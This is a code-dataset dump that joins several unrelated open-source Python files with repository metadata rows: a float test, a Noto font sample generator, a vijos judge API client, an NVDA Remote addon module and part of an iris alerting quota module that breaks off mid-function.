self.assertEqual('%.2g' % 100, '1e+02')
def test_overflow(self):
shuge = '12345' * 120
shuge_float = float(shuge)
shuge_int = int(shuge)
self.assertRaises(OverflowError, float, shuge_int)
self.assertRaises(OverflowError, int, shuge_float)
# and cmp should not overflow
self.assertNotEqual(0.1, shuge_int)
def test_nan(self):
nan = float('nan')
self.assert_(type(nan), float)
if jython:
# support Java syntax
self.assert_(type(float('NaN')), float)
# CPython 2.4/2.5 allow this
self.assertEqual(long(nan), 0)
self.assertNotEqual(nan, float('nan'))
self.assertNotEqual(nan, nan)
self.assertEqual(cmp(nan, float('nan')), 1)
self.assertEqual(cmp(nan, nan), 0)
for i in (-1, 1, -1.0, 1.0):
self.assertEqual(cmp(nan, i), -1)
self.assertEqual(cmp(i, nan), 1)
def test_infinity(self):
self.assert_(type(float('Infinity')), float)
self.assert_(type(float('inf')), float)
self.assertRaises(OverflowError, long, float('Infinity'))
def test_float_none(self):
self.assertRaises(TypeError, float, None)
def test_pow(self):
class Foo(object):
def __rpow__(self, other):
return other ** 2
# regression in 2.5 alphas
self.assertEqual(4.0 ** Foo(), 16.0)
def test_faux(self):
class F(object):
def __float__(self):
return 1.6
self.assertEqual(math.cos(1.6), math.cos(F()))
def test_main():
test_support.run_unittest(FloatTestCase)
if __name__ == '__main__':
test_main()
| bsd-3-clause | -1,937,611,315,161,537,500 | 36.375 | 89 | 0.580984 | false | 3.389474 | true | false | false |
googlefonts/nototools | nototools/generate_sample_from_exemplar.py | 3 | 21941 | #!/usr/bin/env python
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generates script-specific samples (collections of chars) using cldr
exemplar data for languages written in a script."""
import argparse
import codecs
import collections
import locale
import os
from os import path
from nototools.py23 import unichr
from nototools import cldr_data
from nototools import create_image
from nototools import extra_locale_data
from nototools import tool_utils
from nototools import unicode_data
try:
from icu import Locale, Collator
print("will use icu locale-specific order")
_HAVE_ICU = True
except ImportError as e:
print("will use default locale sort order")
_HAVE_ICU = False
NOTO_TOOLS = path.abspath(path.join(path.dirname(__file__), os.pardir))
CLDR_DIR = path.join(NOTO_TOOLS, "third_party", "cldr")
_VERBOSE = False
def get_script_to_exemplar_data_map():
"""Return a map from script to 3-tuples of:
- locale tuple (lang, script, region, variant)
- cldr_relative path to src of exemplar data
- tuple of the exemplar chars"""
script_map = collections.defaultdict(dict)
for directory in ["common", "seed", "exemplars"]:
data_dir = path.join(directory, "main")
for filename in os.listdir(path.join(CLDR_DIR, data_dir)):
if not filename.endswith(".xml"):
continue
exemplar_list = cldr_data.get_exemplar_from_file(
path.join(data_dir, filename)
)
if not exemplar_list:
if _VERBOSE:
print(" no exemplar list for %s" % path.join(data_dir, filename))
continue
lsrv = cldr_data.loc_tag_to_lsrv(filename[:-4])
if not lsrv:
if _VERBOSE:
print(" no lsrv for %s" % path.join(data_dir, filename))
continue
src = path.join(directory, filename)
script = lsrv[1]
if not script:
if _VERBOSE:
print(" no script for %s" % path.join(data_dir, filename))
continue
loc_tag = cldr_data.lsrv_to_loc_tag(lsrv)
loc_to_exemplar_info = script_map[script]
if loc_tag in loc_to_exemplar_info:
if _VERBOSE:
print(
"skipping %s, already have exemplars for %s from %s"
% (src, loc_tag, loc_to_exemplar_info[loc_tag][1])
)
continue
# fix exemplars that look incorrect
if script == "Arab" and "d" in exemplar_list:
if _VERBOSE:
print("found 'd' in %s for %s" % (src, lsrv))
no_latin = True
else:
no_latin = False
# exclude exemplar strings, and restrict to letters and digits
def accept_cp(cp):
if len(cp) != 1:
return False
cat = unicode_data.category(cp)
if cat[0] != "L" and cat != "Nd":
return False
if no_latin and cp in "df":
return False
return True
filtered_exemplar_list = filter(accept_cp, exemplar_list)
# some exemplar lists don't surround strings with curly braces, and end up
# with duplicate characters. Flag these
exemplar_chars = set()
dup_chars = set()
fixed_exemplar_list = []
for cp in filtered_exemplar_list:
if cp in exemplar_chars:
dup_chars.add(cp)
else:
exemplar_chars.add(cp)
fixed_exemplar_list.append(cp)
if len(dup_chars) > 0 and _VERBOSE:
print(
"duplicate exemplars in %s: %s"
% (
src,
", ".join(
[u"\u200e%s\u200e (%x)" % (cp, ord(cp)) for cp in dup_chars]
),
)
)
loc_to_exemplar_info[loc_tag] = (lsrv, src, tuple(fixed_exemplar_list))
# supplement with extra locale data
for loc_tag in extra_locale_data.EXEMPLARS:
exemplar_list = cldr_data.get_exemplar_from_extra_data(loc_tag)
lang, script = loc_tag.split("-")
lsrv = (lang, script, None, None)
loc_to_exemplar_info = script_map[script]
src = "[extra locale data]/%s" % loc_tag
if loc_tag in loc_to_exemplar_info:
if _VERBOSE:
print(
"skipping %s, already have exemplars for %s from %s"
% (src, loc_tag, loc_to_exemplar_info[loc_tag][1])
)
continue
# restrict to letters, except for zsym
def accept_cp(cp):
cat = unicode_data.category(cp)
return cat[0] == "L" or cat == "Nd"
if "Zsym" not in loc_tag:
filtered_exemplar_list = filter(accept_cp, exemplar_list)
if len(filtered_exemplar_list) != len(exemplar_list) and _VERBOSE:
print("filtered some characters from %s" % src)
else:
filtered_exemplar_list = exemplar_list
loc_to_exemplar_info[loc_tag] = (lsrv, src, tuple(filtered_exemplar_list))
return script_map
def show_rarely_used_char_info(script, loc_map, char_to_lang_map):
# let's list chars unique to each language
for loc_tag in sorted(loc_map):
unique_chars = []
dual_chars = []
dual_shared_with = set()
triple_chars = []
triple_shared_with = set()
info = loc_map[loc_tag]
exemplars = info[2]
for cp in exemplars:
num_common_langs = len(char_to_lang_map[cp])
if num_common_langs == 1:
unique_chars.append(cp)
elif num_common_langs == 2:
dual_chars.append(cp)
for shared_loc_tag in char_to_lang_map[cp]:
if shared_loc_tag != loc_tag:
dual_shared_with.add(shared_loc_tag)
elif num_common_langs == 3:
triple_chars.append(cp)
for shared_loc_tag in char_to_lang_map[cp]:
if shared_loc_tag != loc_tag:
triple_shared_with.add(shared_loc_tag)
script_tag = "-" + script
if unique_chars:
print(
"%s has %d unique chars: %s%s"
% (
loc_tag,
len(unique_chars),
" ".join(unique_chars[:100]),
"..." if len(unique_chars) > 100 else "",
)
)
if dual_chars:
print(
"%s shares %d chars (%s%s) with 1 other lang: %s"
% (
loc_tag,
len(dual_chars),
" ".join(dual_chars[:20]),
"..." if len(dual_chars) > 20 else "",
", ".join(
sorted(
[loc.replace(script_tag, "") for loc in dual_shared_with]
)
),
)
)
if triple_chars:
print(
"%s shares %d chars (%s%s) with 2 other langs: %s"
% (
loc_tag,
len(triple_chars),
" ".join(triple_chars[:20]),
"..." if len(triple_chars) > 20 else "",
", ".join(
sorted(
[loc.replace(script_tag, "") for loc in triple_shared_with]
)
),
)
)
if not (unique_chars or dual_chars or triple_chars):
print("%s shares all chars with 3+ other langs" % loc_tag)
def get_char_to_lang_map(loc_map):
char_to_lang_map = collections.defaultdict(list)
for loc_tag in sorted(loc_map):
info = loc_map[loc_tag]
exemplars = info[2]
for cp in exemplars:
if loc_tag in char_to_lang_map[cp]:
print(
"loc %s (from %s) already in char_to_lang_map for %s (%x)"
% (loc_tag, info[1], cp, ord(cp))
)
else:
char_to_lang_map[cp].append(loc_tag)
return char_to_lang_map
def char_lang_info(num_locales, char_to_lang_map):
"""Returns a tuple containing
- characters ordered by the number of langs that use them
- a list mapping number of shared langs to number of chars shared by those langs"""
freq_list = []
hist = [0] * (num_locales + 1)
for cp in char_to_lang_map:
num_shared_langs = len(char_to_lang_map[cp])
if num_shared_langs >= len(hist):
for shared_lang in char_to_lang_map[cp]:
if shared_lang not in loc_map:
print("loc map does not have '%s'!" % shared_lang)
freq_list.append((num_shared_langs, cp))
if num_shared_langs >= len(hist):
print(
"num shared langs is %d but size of hist is %d"
% (num_shared_langs, len(hist))
)
hist[num_shared_langs] += 1
freq_list.sort()
return [cp for nl, cp in freq_list], hist
def show_char_use_info(script, chars_by_num_langs, char_to_lang_map):
script_tag = "-" + script
for cp in chars_by_num_langs:
langs = char_to_lang_map[cp]
count = len(langs)
limit = 12
without_script = [loc.replace(script_tag, "") for loc in langs[:limit]]
without_script_str = ", ".join(sorted(without_script))
if count > limit:
without_script_str += "..."
print(u"char %s\u200e (%x): %d %s" % (cp, ord(cp), count, without_script_str))
print("total chars listed: %d" % len(char_to_lang_map))
def show_shared_langs_hist(hist):
# histogram - number of chars per number of shared languages
for i in range(1, len(hist)):
print("[%3d] %3d %s" % (i, hist[i], "x" * hist[i]))
def get_upper_case_list(char_list):
"""Return the upper case versions where they differ.
If no char in the list is a lower case variant, the result is empty."""
# keep in same order as input list.
upper_case_chars = []
for cp in char_list:
upcp = unicode_data.to_upper(cp)
if upcp != cp:
upper_case_chars.append(upcp)
return upper_case_chars
def show_tiers(char_list, num_tiers, tier_size):
for tier in range(1, num_tiers + 1):
if tier == 1:
subset = char_list[-tier_size:]
else:
subset = char_list[tier * -tier_size : (tier - 1) * -tier_size]
if not subset:
break
tier_chars = sorted(subset)
print("tier %d: %s" % (tier, " ".join(tier_chars)))
upper_case_chars = get_upper_case_list(tier_chars)
if upper_case_chars:
print(" upper: " + " ".join(upper_case_chars))
def get_rare_char_info(char_to_lang_map, shared_lang_threshold):
"""Returns a tuple of:
- a set of 'rare_chars' (those used threshold langs or fewer),
- a mapping from each locale with rare chars to a set of its rare chars"""
rare_chars = set()
locs_with_rare_chars = collections.defaultdict(set)
for cp in char_to_lang_map:
num_shared_langs = len(char_to_lang_map[cp])
if num_shared_langs <= shared_lang_threshold:
rare_chars.add(cp)
for lang_tag in char_to_lang_map[cp]:
locs_with_rare_chars[lang_tag].add(cp)
return rare_chars, locs_with_rare_chars
_lang_for_script_map = {}
def _init_lang_for_script_map():
locs_by_lit_pop = [
loc for _, loc in cldr_data.get_lang_scrs_by_decreasing_global_lit_pop()
]
for t in locs_by_lit_pop:
lsrv = cldr_data.loc_tag_to_lsrv(t)
script = lsrv[1]
if script not in _lang_for_script_map:
lang = lsrv[0]
# print('%s lang => %s' % (script, lang))
_lang_for_script_map[script] = lang
def lang_for_script(script):
"""Return the most common language for a script based on literate population."""
# should use likely subtag data for this.
# the current code assumes all we want is lang -> script, I'd have to change
# it to map locale->locale. Right now I dont' get Hant -> zh_Hant, only
# Hant -> zh, which isn't good enough I think.
if not _lang_for_script_map:
_init_lang_for_script_map()
return _lang_for_script_map.get(script)
def select_rare_chars_for_loc(
script, locs_with_rare_chars, shared_lang_threshold, char_to_lang_map
):
"""Return a list of 2-tuples of loc and selected rare chars,
ordered by decreasing literate population of the locale."""
rarity_threshold_map = {}
for lang_tag in locs_with_rare_chars:
rarity_threshold_map[lang_tag] = shared_lang_threshold
selected = []
locs_by_lit_pop = [
loc for _, loc in cldr_data.get_lang_scrs_by_decreasing_global_lit_pop()
]
# examine locales in decreasing order of literate population
for loc_tag in locs_by_lit_pop:
if script not in loc_tag:
continue
loc_tag = loc_tag.replace("_", "-")
if loc_tag not in locs_with_rare_chars:
continue
most_specific_chars = set()
most_specific_chars_count = rarity_threshold_map[loc_tag]
# From the rare chars for this locale, select those that
# are most specific to this language. In most cases they
# are unique to this language.
for cp in locs_with_rare_chars[loc_tag]:
num_chars = len(char_to_lang_map[cp])
if num_chars <= most_specific_chars_count:
if num_chars < most_specific_chars_count:
most_specific_chars = set()
most_specific_chars.add(cp)
most_specific_chars_count = num_chars
if most_specific_chars:
selected.append((loc_tag, most_specific_chars))
for cp in most_specific_chars:
for tag in char_to_lang_map[cp]:
if rarity_threshold_map[tag] > most_specific_chars_count:
rarity_threshold_map[tag] = most_specific_chars_count
return selected
def show_selected_rare_chars(selected):
print("langs with rare chars by lang pop:")
for lang_tag, chars in selected:
print("%10s: %s" % (lang_tag, ", ".join(sorted(chars))))
def sort_for_script(cp_list, script):
lang = lang_for_script(script)
if not lang:
print("cannot sort for script, no lang for %s" % script)
return cp_list
if _HAVE_ICU:
from icu import Locale, Collator
loc = Locale(lang + "_" + script)
col = Collator.createInstance(loc)
return sorted(cp_list, cmp=col.compare)
else:
import locale
return sorted(cp_list, cmp=locale.strcoll)
def addcase(sample, script):
cased_sample = []
for cp in sample:
ucp = unicode_data.to_upper(cp)
if ucp != cp and ucp not in sample: # Copt has cased chars paired in the block
cased_sample.append(ucp)
if cased_sample:
cased_sample = " ".join(cased_sample)
if _VERBOSE:
print("add case for %s" % script)
return sample + "\n" + cased_sample
return sample
def _generate_excluded_characters():
# Some of these exclusions are desired, and some are reluctantly applied because
# Noto currently does not support some characters. We use the generated
# data as fallback samples on a per-script and not per-font basis, which is also
# a problem.
# Religious characters
# deva OM, Arabic pbuh, bismillah
codepoints = [0x950, 0xFDFA, 0xFDFD]
# Cyrillic characters not in sans or serif
codepoints.append(0x2E2F)
for cp in range(0xA640, 0xA680):
codepoints.append(cp)
# Arabic character not in kufi
codepoints.append(0x08A0)
chars = set()
for cp in codepoints:
chars.add(unichr(cp))
return frozenset(chars)
_EXCLUDE_CHARS = _generate_excluded_characters()
def generate_sample_for_script(script, loc_map):
num_locales = len(loc_map)
if num_locales == 1:
tag, info = next(loc_map.items())
exemplars = info[2]
ex_len = len(exemplars)
info = "%s (1 locale)\nfrom exemplars for %s (%s%d chars)" % (
script,
tag,
"first 60 of " if ex_len > 60 else "",
ex_len,
)
# don't sort, rely on exemplar order
sample = " ".join(exemplars[:60])
sample = addcase(sample, script)
return sample, info
script_tag = "-" + script
char_to_lang_map = get_char_to_lang_map(loc_map)
if len(char_to_lang_map) <= 60:
info = "%s (%d locales)\nfrom merged exemplars (%d chars) from %s" % (
script,
num_locales,
len(char_to_lang_map),
", ".join([loc.replace(script_tag, "") for loc in loc_map]),
)
sample = " ".join(sort_for_script(list(char_to_lang_map), script))
sample = addcase(sample, script)
return sample, info
# show_rarely_used_char_info(script, loc_map, char_to_lang_map)
chars_by_num_langs, num_langs_to_num_chars = char_lang_info(
num_locales, char_to_lang_map
)
# show_char_use_info(chars_by_num_langs, char_to_lang_map)
# show_shared_langs_hist(num_langs_to_num_chars)
# show_tiers(chars_by_num_langs, 3, 40)
shared_lang_threshold = min(7, num_locales)
rare_chars, locs_with_rare_chars = get_rare_char_info(
char_to_lang_map, shared_lang_threshold
)
selected = select_rare_chars_for_loc(
script, locs_with_rare_chars, shared_lang_threshold, char_to_lang_map
)
# show_selected_rare_chars(selected)
chars_by_num_langs = [cp for cp in chars_by_num_langs if cp not in _EXCLUDE_CHARS]
chosen_chars = list(chars_by_num_langs)[-60:]
rare_extension = []
for _, chars in selected:
avail_chars = [
cp
for cp in chars
if cp not in chosen_chars
and cp not in rare_extension
and cp not in _EXCLUDE_CHARS
]
rare_extension.extend(
sorted(avail_chars)[:4]
) # vietnamese dominates latin otherwise
if len(rare_extension) > 20:
break
chosen_chars = chosen_chars[: 60 - len(rare_extension)]
chosen_chars.extend(rare_extension)
info = (
"%s (%d locales)\n"
"from most common exemplars plus chars specific to most-read languages"
% (script, num_locales)
)
sample = " ".join(sort_for_script(chosen_chars, script))
sample = addcase(sample, script)
return sample, info
def generate_samples(dstdir, imgdir, summary):
if imgdir:
imgdir = tool_utils.ensure_dir_exists(imgdir)
print("writing images to %s" % imgdir)
if dstdir:
dstdir = tool_utils.ensure_dir_exists(dstdir)
print("writing files to %s" % dstdir)
verbose = summary
script_map = get_script_to_exemplar_data_map()
for script in sorted(script_map):
sample, info = generate_sample_for_script(script, script_map[script])
if summary:
print()
print(info)
print(sample)
if imgdir:
path = os.path.join(imgdir, "und-%s_chars.png" % script)
print("writing image %s.png" % script)
rtl = script in ["Adlm", "Arab", "Hebr", "Nkoo", "Syrc", "Tfng", "Thaa"]
create_image.create_png(
sample, path, font_size=34, line_spacing=40, width=800, rtl=rtl
)
if dstdir:
filename = "und-%s_chars.txt" % script
print("writing data %s" % filename)
filepath = os.path.join(dstdir, filename)
with codecs.open(filepath, "w", "utf-8") as f:
f.write(sample + "\n")
def main():
default_dstdir = os.path.join(NOTO_TOOLS, "sample_texts")
parser = argparse.ArgumentParser()
parser.add_argument(
"--dstdir",
help="where to write samples (default %s)" % default_dstdir,
default=default_dstdir,
metavar="dir",
)
parser.add_argument(
"--imgdir", help="if defined, generate images in this dir", metavar="dir"
)
parser.add_argument(
"--save", help="write sample files in dstdir", action="store_true"
)
parser.add_argument(
"--summary",
help="output list of samples and how they were generated",
action="store_true",
)
parser.add_argument(
"--verbose", help="print warnings and extra info", action="store_true"
)
args = parser.parse_args()
if not args.save and not args.imgdir and not args.summary:
print("nothing to do.")
return
if args.verbose:
global _VERBOSE
_VERBOSE = True
generate_samples(args.dstdir if args.save else None, args.imgdir, args.summary)
if __name__ == "__main__":
locale.setlocale(locale.LC_COLLATE, "en_US.UTF-8")
main()
| apache-2.0 | -1,551,522,691,316,249,600 | 33.771791 | 88 | 0.557996 | false | 3.630212 | false | false | false |
vijos/jd4 | jd4/api.py | 1 | 5806 | import json
from aiohttp import ClientSession, CookieJar
from asyncio import CancelledError, Queue, get_event_loop
from appdirs import user_config_dir
from os import path
from urllib.parse import urljoin
from jd4.log import logger
_CHUNK_SIZE = 32768
_CONFIG_DIR = user_config_dir('jd4')
_COOKIES_FILE = path.join(_CONFIG_DIR, 'cookies')
_COOKIE_JAR = CookieJar(unsafe=True)
try:
_COOKIE_JAR.load(_COOKIES_FILE)
except FileNotFoundError:
pass
class VJ4Error(Exception):
def __init__(self, name, message, *args):
super().__init__(name, message, *args)
self.name = name
async def json_response_to_dict(response):
if response.content_type != 'application/json':
raise Exception('invalid content type ' + response.content_type)
response_dict = await response.json()
if 'error' in response_dict:
error = response_dict['error']
raise VJ4Error(error.get('name', 'unknown'),
error.get('message', ''),
*error.get('args', []))
return response_dict
class VJ4Session(ClientSession):
def __init__(self, server_url):
super().__init__(cookie_jar=_COOKIE_JAR)
self.server_url = server_url
def full_url(self, *parts):
return urljoin(self.server_url, path.join(*parts))
async def get_json(self, relative_url, **kwargs):
async with self.get(self.full_url(relative_url),
headers={'accept': 'application/json'},
allow_redirects=False,
params=kwargs) as response:
return await json_response_to_dict(response)
async def post_json(self, relative_url, **kwargs):
async with self.post(self.full_url(relative_url),
headers={'accept': 'application/json'},
allow_redirects=False,
data=kwargs) as response:
return await json_response_to_dict(response)
async def judge_consume(self, handler_type):
async with self.ws_connect(self.full_url('judge/consume-conn/websocket')) as ws:
logger.info('Connected')
queue = Queue()
async def worker():
try:
while True:
request = await queue.get()
await handler_type(self, request, ws).handle()
except CancelledError:
raise
except Exception as e:
logger.exception(e)
await ws.close()
worker_task = get_event_loop().create_task(worker())
try:
while True:
queue.put_nowait(await ws.receive_json())
except TypeError:
pass
logger.warning('Connection lost with code %s', ws.close_code)
worker_task.cancel()
try:
await worker_task
except CancelledError:
pass
async def judge_noop(self):
await self.get_json('judge/noop')
async def login(self, uname, password):
logger.info('Login')
await self.post_json('login', uname=uname, password=password)
async def login_if_needed(self, uname, password):
try:
await self.judge_noop()
logger.info('Session is valid')
except VJ4Error as e:
if e.name == 'PrivilegeError':
await self.login(uname, password)
await get_event_loop().run_in_executor(
None, lambda: _COOKIE_JAR.save(_COOKIES_FILE))
else:
raise
async def judge_datalist(self, last):
return await self.get_json('judge/datalist', last=last)
async def problem_data(self, domain_id, pid, save_path):
logger.info('Getting problem data: %s, %s', domain_id, pid)
loop = get_event_loop()
async with self.get(self.full_url('d', domain_id, 'p', pid, 'data'),
headers={'accept': 'application/json'}) as response:
if response.content_type == 'application/json':
response_dict = await response.json()
if 'error' in response_dict:
error = response_dict['error']
raise VJ4Error(error.get('name', 'unknown'),
error.get('message', ''),
*error.get('args', []))
raise Exception('unexpected response')
if response.status != 200:
raise Exception('http error ' + str(response.status))
with open(save_path, 'wb') as save_file:
while True:
buffer = await response.content.read(_CHUNK_SIZE)
if not buffer:
break
await loop.run_in_executor(None, save_file.write, buffer)
async def record_pretest_data(self, rid):
logger.info('Getting pretest data: %s', rid)
async with self.get(self.full_url('records', rid, 'data'),
headers={'accept': 'application/json'}) as response:
if response.content_type == 'application/json':
response_dict = await response.json()
if 'error' in response_dict:
error = response_dict['error']
raise VJ4Error(error.get('name', 'unknown'),
error.get('message', ''),
*error.get('args', []))
raise Exception('unexpected response')
if response.status != 200:
raise Exception('http error ' + str(response.status))
return await response.read()
| agpl-3.0 | 3,391,138,550,875,149,300 | 39.887324 | 88 | 0.539786 | false | 4.391831 | false | false | false |
NVDARemote/NVDARemote | addon/globalPlugins/remoteClient/local_machine.py | 1 | 3437 | import os
import wx
from . import input
import api
import nvwave
import tones
import speech
import ctypes
import braille
import inputCore
try:
from systemUtils import hasUiAccess
except ModuleNotFoundError:
from config import hasUiAccess
import ui
import versionInfo
import logging
logger = logging.getLogger('local_machine')
def setSpeechCancelledToFalse():
"""
This function updates the state of speech so that it is aware that future
speech should not be cancelled. In the long term this is a fragile solution
as NVDA does not support modifying the internal state of speech.
"""
if versionInfo.version_year >= 2021:
# workaround as beenCanceled is readonly as of NVDA#12395
speech.speech._speechState.beenCanceled = False
else:
speech.beenCanceled = False
class LocalMachine:
def __init__(self):
self.is_muted = False
self.receiving_braille=False
def play_wave(self, fileName):
"""Instructed by remote machine to play a wave file."""
if self.is_muted:
return
if os.path.exists(fileName):
# ignore async / asynchronous from kwargs:
# playWaveFile should play asynchronously from NVDA remote.
nvwave.playWaveFile(fileName=fileName, asynchronous=True)
def beep(self, hz, length, left, right, **kwargs):
if self.is_muted:
return
tones.beep(hz, length, left, right)
def cancel_speech(self, **kwargs):
if self.is_muted:
return
wx.CallAfter(speech._manager.cancel)
def speak(
self,
sequence,
priority=speech.priorities.Spri.NORMAL,
**kwargs
):
if self.is_muted:
return
setSpeechCancelledToFalse()
wx.CallAfter(speech._manager.speak, sequence, priority)
def display(self, cells, **kwargs):
if self.receiving_braille and braille.handler.displaySize > 0 and len(cells) <= braille.handler.displaySize:
# We use braille.handler._writeCells since this respects thread safe displays and automatically falls back to noBraille if desired
cells = cells + [0] * (braille.handler.displaySize - len(cells))
wx.CallAfter(braille.handler._writeCells, cells)
def braille_input(self, **kwargs):
try:
inputCore.manager.executeGesture(input.BrailleInputGesture(**kwargs))
except inputCore.NoInputGestureAction:
pass
def set_braille_display_size(self, sizes, **kwargs):
sizes.append(braille.handler.display.numCells)
try:
size=min(i for i in sizes if i>0)
except ValueError:
size = braille.handler.display.numCells
braille.handler.displaySize = size
braille.handler.enabled = bool(size)
def send_key(self, vk_code=None, extended=None, pressed=None, **kwargs):
wx.CallAfter(input.send_key, vk_code, None, extended, pressed)
def set_clipboard_text(self, text, **kwargs):
api.copyToClip(text=text)
def send_SAS(self, **kwargs):
"""
This function simulates as "a secure attention sequence" such as CTRL+ALT+DEL.
SendSAS requires UI Access, so we provide a warning when this fails.
This warning will only be read by the remote NVDA if it is currently connected to the machine.
"""
if hasUiAccess():
ctypes.windll.sas.SendSAS(0)
else:
# Translators: Sent when a user fails to send CTRL+ALT+DEL from a remote NVDA instance
ui.message(_("No permission on device to trigger CTRL+ALT+DEL from remote"))
logger.warning("UI Access is disabled on this machine so cannot trigger CTRL+ALT+DEL")
| gpl-2.0 | 3,369,433,582,321,457,000 | 28.963964 | 133 | 0.719814 | false | 3.314368 | false | false | false |
dwang159/iris-api | src/iris/sender/quota.py | 2 | 14107 | # Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
from time import time
from gevent import spawn, sleep
from gevent.lock import Semaphore
from collections import deque
from datetime import datetime
import iris.cache
from iris import metrics
import logging
import ujson
logger = logging.getLogger(__name__)
get_application_quotas_query = '''SELECT `application`.`name` as application,
`application_quota`.`hard_quota_threshold`,
`application_quota`.`soft_quota_threshold`,
`application_quota`.`hard_quota_duration`,
`application_quota`.`soft_quota_duration`,
`target`.`name` as target_name,
`target_type`.`name` as target_role,
`application_quota`.`plan_name`,
`application_quota`.`wait_time`
FROM `application_quota`
JOIN `application` ON `application`.`id` = `application_quota`.`application_id`
LEFT JOIN `target` on `target`.`id` = `application_quota`.`target_id`
LEFT JOIN `target_type` on `target_type`.`id` = `target`.`type_id` '''
insert_application_quota_query = '''INSERT INTO `application_quota` (`application_id`, `hard_quota_threshold`,
`soft_quota_threshold`, `hard_quota_duration`,
`soft_quota_duration`, `plan_name`,
`target_id`, `wait_time`)
VALUES (:application_id, :hard_quota_threshold, :soft_quota_threshold,
:hard_quota_duration, :soft_quota_duration, :plan_name, :target_id, :wait_time)
ON DUPLICATE KEY UPDATE `hard_quota_threshold` = :hard_quota_threshold,
`soft_quota_threshold` = :soft_quota_threshold,
`hard_quota_duration` = :hard_quota_duration,
`soft_quota_duration` = :soft_quota_duration,
`plan_name` = :plan_name,
`target_id` = :target_id,
`wait_time` = :wait_time'''
create_incident_query = '''INSERT INTO `incident` (`plan_id`, `created`, `context`, `current_step`, `active`, `application_id`)
VALUES ((SELECT `plan_id` FROM `plan_active` WHERE `name` = :plan_name),
:created, :context, 0, TRUE, :sender_app_id)'''
check_incident_claimed_query = '''SELECT `active` FROM `incident` WHERE `id` = :id'''
required_quota_keys = frozenset(['hard_quota_threshold', 'soft_quota_threshold',
'hard_quota_duration', 'soft_quota_duration',
'plan_name', 'wait_time', 'target_name'])
quota_int_keys = ('hard_quota_threshold', 'soft_quota_threshold',
'hard_quota_duration', 'soft_quota_duration', 'wait_time')
soft_quota_notification_interval = 1800
class ApplicationQuota(object):
def __init__(self, db, expand_targets, message_send_enqueue, sender_app):
self.db = db
self.expand_targets = expand_targets
self.message_send_enqueue = message_send_enqueue
self.iris_application = None
if sender_app:
self.iris_application = iris.cache.applications.get(sender_app)
if self.iris_application:
logger.info('Using iris application (%s) for sender quota notifications.', sender_app)
else:
logger.error('Invalid iris application (%s) used for sender. Quota breach notificiations/incidents will not work.', sender_app)
else:
logger.warning('Iris sender_app not configured so notifications for quota breaches will not work')
self.rates = {} # application: (hard_buckets, soft_buckets, hard_limit, soft_limit, wait_time, plan_name, (target_name, target_role))
self.last_incidents = {} # application: (incident_id, time())
self.last_incidents_mutex = Semaphore()
self.last_soft_quota_notification_time = {} # application: time()
self.last_soft_quota_notification_time_mutex = Semaphore()
metrics.add_new_metrics({'quota_hard_exceed_cnt': 0, 'quota_soft_exceed_cnt': 0})
spawn(self.refresh)
def get_new_rules(self):
session = self.db.Session()
for row in session.execute(get_application_quotas_query):
yield row
session.close()
def refresh(self):
while True:
logger.info('Refreshing app quotas')
new_rates = {}
for application, hard_limit, soft_limit, hard_duration, soft_duration, target_name, target_role, plan_name, wait_time in self.get_new_rules():
new_rates[application] = (hard_limit, soft_limit, hard_duration / 60, soft_duration / 60, wait_time, plan_name, (target_name, target_role))
old_keys = self.rates.viewkeys()
new_keys = new_rates.viewkeys()
# Remove old application entries
for key in old_keys - new_keys:
logger.info('Pruning old application quota for %s', key)
try:
del(self.rates[key])
del(self.last_incidents[key])
except KeyError:
pass
# Create new ones with fresh buckets
for key in new_keys - old_keys:
hard_limit, soft_limit, hard_duration, soft_duration, wait_time, plan_name, target = new_rates[key]
self.rates[key] = (deque([0] * hard_duration, maxlen=hard_duration), # hard buckets
deque([0] * soft_duration, maxlen=soft_duration), # soft buckets
hard_limit, soft_limit, wait_time, plan_name, target)
# Update existing ones + append new time interval. Keep same time bucket object if duration hasn't changed, otherwise create new
# one and resize accordingly
for key in new_keys & old_keys:
hard_limit, soft_limit, hard_duration, soft_duration, wait_time, plan_name, target = new_rates[key]
self.rates[key] = (self.rates[key][0] if len(self.rates[key][0]) == hard_duration else deque(self.rates[key][0], maxlen=hard_duration),
self.rates[key][1] if len(self.rates[key][1]) == soft_duration else deque(self.rates[key][1], maxlen=soft_duration),
hard_limit, soft_limit, wait_time, plan_name, target)
# Increase minute interval for hard + soft buckets
self.rates[key][0].append(0)
self.rates[key][1].append(0)
metrics.add_new_metrics({'app_%s_quota_%s_usage_pct' % (app, quota_type): 0 for quota_type in ('hard', 'soft') for app in new_keys})
logger.info('Refreshed app quotas: %s', ', '.join(new_keys))
sleep(60)
def allow_send(self, message):
application = message.get('application')
if not application:
return True
# Purpose of quotas is to protect downstreams. If we're already going to drop this message,
# don't let it account against quota.
if message.get('mode') == 'drop':
return True
rate = self.rates.get(application)
if not rate:
return True
hard_buckets, soft_buckets, hard_limit, soft_limit, wait_time, plan_name, target = rate
# Increment both buckets for this minute
hard_buckets[-1] += 1
soft_buckets[-1] += 1
# If hard limit breached, disallow sending this message and create incident
hard_quota_usage = sum(hard_buckets)
hard_usage_pct = 0
if hard_limit > 0:
hard_usage_pct = (hard_quota_usage / hard_limit) * 100
metrics.set('app_%s_quota_hard_usage_pct' % application, hard_usage_pct)
if hard_quota_usage > hard_limit:
metrics.incr('quota_hard_exceed_cnt')
with self.last_incidents_mutex:
self.notify_incident(application, hard_limit, len(hard_buckets), plan_name, wait_time)
return False
# If soft limit breached, just notify owner and still send
soft_quota_usage = sum(soft_buckets)
soft_usage_pct = 0
if soft_limit > 0:
soft_usage_pct = (soft_quota_usage / soft_limit) * 100
metrics.set('app_%s_quota_soft_usage_pct' % application, soft_usage_pct)
if soft_quota_usage > soft_limit:
metrics.incr('quota_soft_exceed_cnt')
with self.last_soft_quota_notification_time_mutex:
self.notify_target(application, soft_limit, len(soft_buckets), *target)
return True
return True
def notify_incident(self, application, limit, duration, plan_name, wait_time):
if not self.iris_application:
logger.warning('Application %s breached hard quota. Cannot notify owners as application is not set', application)
return
if not plan_name:
logger.error('Application %s breached hard quota. Cannot create iris incident as plan is not set (may have been deleted).', application)
return
